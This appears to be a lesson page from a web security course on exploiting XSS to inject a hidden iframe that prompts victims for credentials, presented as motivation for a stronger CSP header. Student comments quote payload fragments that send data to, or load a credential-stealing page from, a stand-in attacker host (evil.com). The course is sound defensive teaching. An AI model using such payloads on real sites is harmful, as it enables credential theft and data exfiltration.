1. 16
    Prompt Users for Credentials from a Vulnerable Website via iframe Injection
    1m 36s

Prompt Users for Credentials from a Vulnerable Website via iframe Injection

InstructorMike Sherov

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In this lesson, we'll learn how to exploit an XSS vulnerability to prompt victims for their usernames and passwords on a vulnerable site by loading up a IFRAME from the attacker's website. This will demonstrate that even though we've already mitigated JS based XSS attacks, there are other ways to exploit XSS, and we'll need a more robust CSP header to completely mitigate XSS, which we'll discover in our next lesson!

~ 4 years ago

typo: 'propmt' should be -> 'prompt'

~ 4 years ago

at payload level: img.src = https://evel.com:666/hijack?payload=${payload} should be img.src = https://evil.com:666/hijack?payload=${payload}

~ 4 years ago

i guess that 'payload', this time, should be only :

< iframe hidden src="https://evil.com:666/steal.html"></iframe>

Lucas Minter
~ 4 years ago

Thanks for this! I got the transcripts updated!